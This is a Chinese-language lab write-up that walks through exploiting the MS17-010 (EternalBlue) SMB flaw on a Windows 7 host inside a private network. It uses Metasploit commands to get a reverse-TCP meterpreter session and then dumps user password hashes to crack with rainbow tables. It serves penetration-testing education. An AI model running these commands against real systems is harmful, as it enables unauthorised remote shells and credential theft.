metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)

metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)

0x01 知识点

MSF工具的利用,ms17-010漏洞实验

0x02 实验环境:

攻击机kaili linux 2020 (ip:192.168.233.129)

目标机:win7(ip:192.168.233.130)

 

0x03 实验准备

  1. 启动msf,输入msfconsole
  2. 检错漏洞库,输入search ms ,检查msf库里是否存在ms17-010漏洞

metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)

  3、nmap检测目标机开放端口

nmap –sV 192.168.233.130

metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)

证明目标机445端口开放,存在攻击条件

0x04实验过程

  • 1、配置exploit

use exploit/windows/smb/ms17_010_eternalblue 

metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)

提示:使用模块后,它会告诉我们默认有效载荷是什么,此处pay载荷 windows/x64/meterpreter/reverse_tcp 下文攻击会用到

设置目标IP,通过查看设置选项,show options,此处RHOSTS为攻击目标需要设置

metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)

set rhost 192.168.233.130

metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)

注意:选项中说明了此exploit对应的目标系统,所以并不是具有该漏洞的系统都能利用此exploit;

  • 2、配置payload

payload只需要配置监听返回会话的IP

metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)

警告:攻击过程可能导致目标系统宕机重启,谨慎操作!

  • 3、攻击

msf exploit(ms17_010_eternalblue) > exploit

metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)

 

session对话创建成功,msf5就会变成meterpreter,攻击成功

meterpreter > sysinfo

可以查看目标机信息     metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)

可以输入其他命令

0x05 后渗透阶段

详见下一篇文章

  • 1、利用脚本获取服务器用户及哈希

meterpreter > run post/windows/gather/smart_hashdump

metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)

利用彩虹表解开administrator的密码

  • 2、截屏

metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)